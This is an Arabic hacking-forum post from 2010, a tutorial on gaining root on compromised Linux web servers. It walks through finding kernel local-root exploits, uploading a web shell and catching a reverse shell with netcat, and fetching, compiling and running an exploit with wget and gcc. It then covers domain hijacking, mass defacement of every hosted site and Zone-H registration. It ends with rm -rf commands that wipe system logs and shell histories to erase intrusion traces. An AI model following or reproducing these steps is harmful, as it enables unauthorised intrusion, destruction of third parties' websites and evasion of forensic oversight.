التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-09-2010, 02:28 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
ViRuS Qalaa
iraQi HackerS
 
الصورة الرمزية ViRuS Qalaa
 

 

 
إحصائية العضو







ViRuS Qalaa غير متواجد حالياً

إرسال رسالة عبر MSN إلى ViRuS Qalaa

 

 

إحصائية الترشيح

عدد النقاط : 10
ViRuS Qalaa is on a distinguished road

.................... |~Root In Server By ViRuS Qalaa~|




اهلا وسهلا بكم ياعناكب في موضوعي (Root in server) الذي سوف يشرح لكم كيفية اخذ الروت وماذا تفعل بعد اخذ الروت وكل شيء متعلق بلروت

في بداية الامر سوف ينقسم هذا الموضوع الى :
الجزء الاول: ماهو الروت (What is root)
الجزء الثاني: كيف يمكن الحصول على الروت (How can I get on the root)
الجزء الثالث: اللوكل روت وكيف البحث عنة (local root and how to search for him)
الجزء الرابع: اتصال بلسيرفر بكل الطريق (Contact Server Every way)
الجزء الخامس: الحصول على الروت (Access to root)
الجزء السادس: ماذا بعد الروت (What happens after root)
الجزء السابع: سحب الدومنين (The withdrawal of my domain)
الجزء الثامن: عمل ماس ديفس (The work of Mass Davis)
الجزء التاسع: التسجيل فى الزون اتش المواقع المخترقة (To register the zon-h hacked sites)
الجزء العشر: مسح اثارك من السيرفر (Clear the tracks from the serve)
الجزء الحادي عشر: بعض المواضع الاخرى للروت وبعد الروت



=====================


قبل ان ابدأ في الموضوع انة طرحت قبل هذا الموضوع موضعي [الروت تحت المجهر] وبسبب اخطأ بسيطة ان الصور انمسحت وصارت لخبطة فية وبعض المشاكل لذلك قررت ان انزل هذا الموضوع وجعلتة smilies4 مبني على ذلك الموضوع الروت تحت المجهر واضفت علية بس الشروحات الأقوى وبعض الصور التوضيحية لذلك اتمنى ان يعجبكم هذا الموضوع واتمنى ان يستفاد الكل وشكرا لك :kiss: وبدون اطالة نبدأ بلموضوع :yes:



الجزء الاول: ماهو الروت (What is root)


الروت : هو اعلى صلاحية في السيرفر لينكس واذا حصل شخص على صلاحية الروت يكون السيرفر كلة في خطر تام كيف يكون السيرفر في خطر انة اقول لك يمكن بعد الحصول على الروت يمكن تسحب الدومنينات المواقع ويمكن تغير جميع انديكسات الموقع بأنديكس اختراق وهذا مايسمى بلــــماس ديفس وراح اشرح في الفقرات التالية وذا حصلت على الروت يكون السيرفر ملكك وهنا فهمنا ماهو الروت واكيد لي يريد يأخذ روت لازم يعرف ماهو الروت اصلا ويكون لدية خبرة في اختراق المواقع


الجزء الثاني: كيف يمكن الحصول على الروت (How can I get on the root)

هناك طرق كثيرة في الحصول على الروت وسوف اذكر اهم الطرق وهي...)
1-عن طريق اللوكل روت وهي استغلال ثغرة في بكرنيل السيرفر ,وحسب اصدار الكرنيل
2-عن طريق استغلال ثغرات البرنامج لي على السيرفر
3-عن طريق قرأة الملفات لي يكون فية باسورد الروت << وعتقد ان هناك درس في دورة sql كيف اخذ باسورد الروت

وهم طريقة والطريقة الشائعة الان هي طريقة اللوكل الروت واصدار الكرنيل لان نشرح هذة الطريقة
لكل سيرفر كرنيل واصدار لهذا الكرنيل والهكر الكبار مثلي smilies8 هههههه يجدون ثغرة لهذا الاصدار الكرنيل وينقلون هذة الثغرة في اصدار الكرنيل الى مواقع السيكورتي واحنة نستغل هذة الثغرة ومايسمى بلوكل روت وعن طريق الاستغلال هذة الثغرة في السيرفر نحصل على الروت وان شاء الله اشرح لكم الطرق الباقية بأذن الله



الجزء الثالث: اللوكل روت وكيف البحث عنة (local root and how to search for him)
في البداية لنعرف ماهو لوكل الروت :برنامج مبرمج لستغلال ثغرة في اصدار الكرنيل ولوكلات مبرمجة بلغة c وهناك لوكلات مترجمة وذا كان اللوكل مبرمجة بلغة c يحتاج لها ترجمة قبل التشغيل وسوف اشرح لكم في الفقرات التالية بس كيف نفرق بين المترجم والغير مترجم انة اقول لك اذا لوكل منتهي بمتداد c فانة غير مترجم ويحتاج ترجمة واذا لوكل منتهي بغير امتداد او اي امتداد اخر فانة مترجم بس لماذا اللوكل دائما بلغة c لان نوة الكرنيل في نضام لينكس تكون مبرمجة بلغة c شفتوا لازم تتعلموا لينكس لانهو يفيدكم كثيرا :etonnement-29[1]:


الان كيف نعرف لوكل المناسب لنا وكيف نقوم بلبحث عنة قي البداية عندما ترفع الشل على السيرفر نقوم بتنفيذ الامر التالي (uname -a) او يمكن رؤية اصدار الكرنيل في بداية الشل كما في الصورة التالية


اصدار الكرنيل :
الي بلون الاخضر ذا اصدار الكرنيل
ولي بلون الازرق ذا النحديث نواة الكرنيل

او يمكن تنفيذ الامر التالي uname -a ايظا ليظهر لك اصدار لوكل
[IMG][/IMG]

الان نريد كيف نبحث على هذا اصدار الكرنيل نريد لة لوكل روت كيف
اولا:عن طريق الاخ قوقل كيف تروح لقوقل وتكتب
local root xxx
حيث xxx نضع بدلة اصدار الكرنيل
او
local root exploit xxx
حيث xxx اصدار الكرنيل نضعة بدلة
ولازم تعرف تحديث الكرنيل مثيل 2009 او 2010 لان كل لوكل يختلف في التحديث

ثانيا:عن طريق مواقع السكيورتي
سوف اشرح على اهم موقع لان والاقوى
هذا الموقع
http://www.exploit-db.com
وتضغط على كلمة Search من اعلى الخيارات ويظهر لك
كما في الصورة التالية في البحث


ونكتب في البحث كذا
localroot xxx
حيث xxx نضع بدلة اصدار الكرنيل
وتختار النوع

وان شاء الله راح تحصل على لوكل روت المناسب
وهذا مواقع لبحث على لوكل
كود PHP:
http://www.hoobie.net/security/exploits/index.html  http://www.milw0rm.com/parse.php?platform=linux  http://exploits.cx/exploits/index.p...exploits/kernel  http://addict3d.org/index.php?page=archive&day=20030930  http://www.linuks.org/search.php?topic=linux  http://www.mormoroth.by.ru/Local-Root/  http://www.mormoroth.by.ru/Archive/  http://www.packetstormsecurity.org/U...ts/index4.html  http://securitydot.net/search/exploi...ocal+root.html  http://www.packetstormsecurity.org/ 
وهذة المكتبة من انشائي الخاصة بشبكة العناكب الاحترافية
|~ُ مكتبة العناكب للوكلات روت ~ُ|


الجزء الرابع: اتصال بلسيرفر بكل الطريق (Contact Server Every way)


اهم يشيء بعد الحصول على لوكل روت هو الاتصال بلسيرفر يعني اذا ماتصلنة بلسيرفر ماراح نحصل على روت والاتصال بلسيرفر يعني بدل ماتروح لشل تروح لشلشة الدوس وتنفذ الاوامر وهناك طرق كثير لاتصال بلسيرفر وهناك موضوع لاخ فالكوني يشرح هذة الاتصال بثلاثة طرق وهذا رابط الموضوع
شرح الاتصال العكسي باعقد السيرفرات بثلاث طرق والاتصال ينجح باذن الله

وانة راح اشرح لكم طريقة رابعة لي مايستطيع فتح بورت في جهازة مثلي
هناك طرق كثيرة لتسجيل في موقع ريلاكس البخيل smilies13 ماني راح اشرح انتة احصل على حساب والان بعد الحصول على حساب
والان بعد الحصول على الحساب يمكنك ان تتصل وانشاء اتصال VPN

الان سوف اشرح لكم الاتصال بلسيرفر بعد ماعملة اتصال VPN يلا نبدأ على بركة الله
في البداية الأمر نحمل هذة الاداة وهي netcat
كود PHP:
http://www.4shared.com/file/Y24T3K5i/netcat.html 
نفك الضغط عنها ونضعها على مسار الهارد c او اي هارد انتة واضع الوندوز فية
الان كل شيء تمام نحمل هذا الشل وهو شل Egy_Spider العربي الاصدار الثاني القوى والافضل والاروع لحد الان في سنة 2010 الجديد كليا
كود PHP:
http://www.4shared.com/file/tEh29RB6/Egy_Spider_Ar.html 
نرفع الشل على موقع المصاب او الموقع لي انتة تريد الحصول علية على روت اوكي

الان نذهب الى الدوس كما يلي

start>>Run>>cmd
تم الدخول لــــ Dos

ونضع الامر التالي
cd\

وبعد ذلك ندخل الى حافظة النت كات بلأمر
cd netcat


تم الدخول

اوكي كل شيء تمام الان نذهب الى هذا الموقع
كود PHP:
http://www.ip-adress.com/ 
لمعرفة ip الخاص فينة
الان نذهب الى الشل لي احنة رافعينة على الموقع الى اخر الشل


1-ip لي احنة طلعناة من الموقع لي فوق
2-البورت وراح نستخدم بورت 443 البورت الخاص في اتصال ريلاكس
3-لانغير شيء
4-لاتضغ الان بعد قليل من اقول لك

الان كل شيء تمام نرجع الى النت كات
ونكتب الامر
nc -vlp port
مع تغير port
الى 443 بورت اتصال ريلاكس


الان نضغط انتر (enter)

ونذهب الى الشل ونضغط رقم اربعة وهو (Connect)

الان تم الاتصال بلشل الان انتهينة من هذة الخطوة الحمد لله




ولي مايستطيع الحصول على حساب ريلاكس يمكنة استخدام هذا البرنامج فهوا عملة نفس عمل حساب ريلاكس واسم البرنامج هو proXPN ويمكنك البحث عنة بغرغور (يعني قوقل) وسوف تجد لة شروحات كثيرة وهو مشهور جدا ^_*


الجزء الخامس: الحصول على الروت (Access to root)
بعد ما اتصلنة بلسيرفر ووجدنة اللوكل المناسب الان نريد سحب الروت على السيرفر
اول شيء لحصول على الروت هو سحب لوكل على الموقع ويقصل ان يكون المجلد يحمل تصريح 777
ويسحب اللوكل بامر
wegt www.viers.com/localroot.zip
wegt<<<الامر السحب
www.viers.com/local.zip<<<موقع لوكل او انتة ترفع لوكل على اي موقع مجاني ويفض لوكل بمتداد zip
الان تم السحب
نفط الضغط بامر
unzip local.zip
unzip<<<امر فك الضغط
local.zip<<<اسم لوكل مع الامتداد

الان نعطي لوكل تصريح 777 بامر
chmod 777 local.c
chmod<<<امر تغير تصريح اي ملف
777<<<رقم التصريح
local.c<<<لوكل

بعد ذلك نترجم اللوكل بامر التالي
gcc local.c –o local
بعد سوف تجد لوكل بدون امتداد هكذا
local
بعد ذلك نعطي اللوكل المترجم تصريح 777 بامر التالي
chmod 777 local
بعد ذلك نشغل اللوكل بامر
local ./
وسوف يشتغل لوكل
نقوم بتنفيذ الامر التالي لرؤية الاصلاحية الان
id
الان صلاحيتنة روت
ننفذ لامر التالي
su
لحصول على صلاحية روت كاملة



وهذا شرح لحصول على الروت
[hide]اضغط هنا [/hide]
[hide]
كود PHP:
الحقوق محفوضة لــــ SnakE1095 
[/hide]

لكن هناك لوكلات مختلفة يراد لة عمل مختلف لكن اذا تريد تحترف في اخذ روت واي سيرفر يقابلك تأخذ روت وتتجاوز اي معوق امامك علية اذان حمل كل هذة الدرس قي الموضوع التالي
اضغط هنا


الجزء السادس: ماذا بعد الروت (What happens after root)


بعد الروت ماذا تفعل اممممم تعرف كل شيء تستطيع ان تفعلة مثل سحب الدومينات المواقع ورفع الانديكس على الموقع على السيرفر ومايسمى (بلماس ديفس) وتستطيع سحب الباسوردات المواقع وسحب السي بنلات المواقع بختصار كل شيء تسطتيع ان تفعل مسح تعديل على المواقع وغيرة
لكن انة سوف اشرح لكم اهم الاشياء بلـــروت ودائما الهكر تفعلة وهي عمل ماس ديفس وهي تغير جميع انديكسات السيرفرات الى انديكس الاختراق وسحب الدومينات السيرفر ..الخ




الجزء السابع: سحب الدومنين (The withdrawal of my domain)
راح اعطيكم شرح فيديوا لسحب الدمنين المواقع على السيرفر الحقوق او الطريق محفوظة لمنتديات القراصنة السعودية

[hide]
كود PHP:
http://www.4shared.com/file/147395310/2574ebd2/ee_online.html 
[/hide]


الجزء الثامن: عمل ماس ديفس (The work of Mass Davis)
الماس الديفس الفائدة من هو تغير جميع صفحات المواقع لي على السيرفر الى انديكس الاختراق بدل ماتروح لموقع موقع وتغير الانديكس مثلا يوجد انديكس في مجلد وفية مجلد اخر داخل هذا المجلد وفية index.html يقوم بتغيرة منة هنا تأتي الفائدة من هذة السكريب طبعا السكريب بلغة البيرل perl
وهنا شرح فيديوا لعمل ماس ديفس + السكريب لعمل ماس ديفس
اضغط هنا
لتحميل
جميع الحقوق محفوضة لصاحب الشرح


الجزء التاسع: التسجيل فى الزون اتش المواقع المخترقة (To register the zon-h hacked sites)


بعد ماتقوم بعمل ماس ديفس وتغير جميع الانديكسات الموقع وتريد سجل اختراق المواقع لي على السيرفر في زون اتش والمواقع لي على السيرفر 250 موقع كيف اذا سجل الاختراق تأخذ واحد واحد بس هاي العملية طويلة ومجهدة لذلك اتى سكريب بلغة البيريل يسجل اخترقاتك في الزون اتش بدقيقة وهذا شرح موجود في المنتدى
سكربت للتسجيل بالزون إتش




الجزء العشر: مسح اثارك من السيرفر (Clear the tracks from the serve)


بعد عمل ماس ديفس لازم نقوم بمسح اثارك على السيرفر ويوجد بياناتك في ملف اسمة لوقل هسة تقول لي ماهو ملف لوقل هو ملف يقوم بحفظ اي بي تبعك واثاراك على السيرفر طيب كيف نمسحة انة اقول لك بمجموعة من الأوامر تنفذة على السيرفر وسوف ينمسح ملف لوقل بأذن الله
وهذة الأوامر:قم بتنفيذ بعد الحصول على صلاحية الروت وعمل ماس ديفس *_*
[hide]
كود PHP:
rm -rf /tmp/logs   rm -rf $HISTFILE   rm -rf /root/.ksh_history   rm -rf /root/.bash_history   rm -rf /root/.ksh_history   rm -rf /root/.bash_logout    rm -rf /usr/local/apache/logs   rm -rf /usr/local/apache/log   rm -rf /var/apache/logs   rm -rf /var/apache/log   rm -rf /var/run/utmp   rm -rf /var/logs   rm -rf /var/log   rm -rf /var/adm   rm -rf /etc/wtmp   rm -rf /etc/utmp   find / -name *.bash_history -exec rm -rf {}  \;   find / -name *.bash_logout -exec rm -rf {} \;   find / -name "log*" -exec rm -rf {} \;   find / -name *.log -exec rm -rf {} \; 
[/hide]


الجزء الحادي عشر: بعض المواضيع الاخرى للروت وبعد الروت
[ مآ بعد آلروت ] وش تـسوي .. آدخل آقلك ..
[ مآ بعد آلروت ] وش تـسوي .. آدخل آقلك ..

شرح حصول على صلاحيات root من لوحة تحكم ][WHMC][
شرح حصول على صلاحيات root من لوحة تحكم ][WHMC][

شرح اخذ رووت عبر ثغرات الكرنال او بما يسمى لوكال رووت (فديو)
شرح اخذ رووت عبر ثغرات الكرنال او بما يسمى لوكال رووت (فديو)

وفي مواضيع كثير بلمنتدى ابحث عنها بلمنتدى وسوف تجدها بأذن الله



اتمنى ان يعجبكم موضيعي واتمنى ان تفهوا كيف اخذ الروت ولي مايعرف بعد كيف يأخذ روت خل يبطل افضل لك
smilies18
لاتحرموني من ردرودك ولاتنسوى التقيم وان شاء الله فية المزيد والمزيد :Great: من اجل تطوير هذا المنتدى الرائع وشكرا لك وتحياتي وتقديري الى الكل :00001734[1]:
تم الشرح بواسطة:
ViRuS Qalaa
جميع الحقوق محفوظة smilies11
والى لقاء ولاتنسوا التقيم + الردود
والاهداء الموضوع الى :
الى كل اعضاء ومدراء ومشرفين ومراقبين المنتدى






|ZRoot In Server By ViRuS QalaaZ|

التوقيع

12 My Twelve Imams


Good Bye VbSpiders
I'll Back
Si
gn Out

 


التعديل الأخير تم بواسطة ViRuS Qalaa ; 03-14-2011 الساعة 12:33 AM.

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
|~Root In Server By ViRuS Qalaa~| ViRuS Qalaa قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 156 02-20-2011 10:56 AM
شرح رفع الانديكس على جهاز الضحية حصريا لاول مرة من ViRuS Qalaa ViRuS Qalaa قســم إختــراق الأجهــزة 23 01-01-2011 02:57 PM
Get root server 2 BrOx-Dz Hackers Showoff 0 10-21-2010 01:36 AM


الساعة الآن 06:49 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0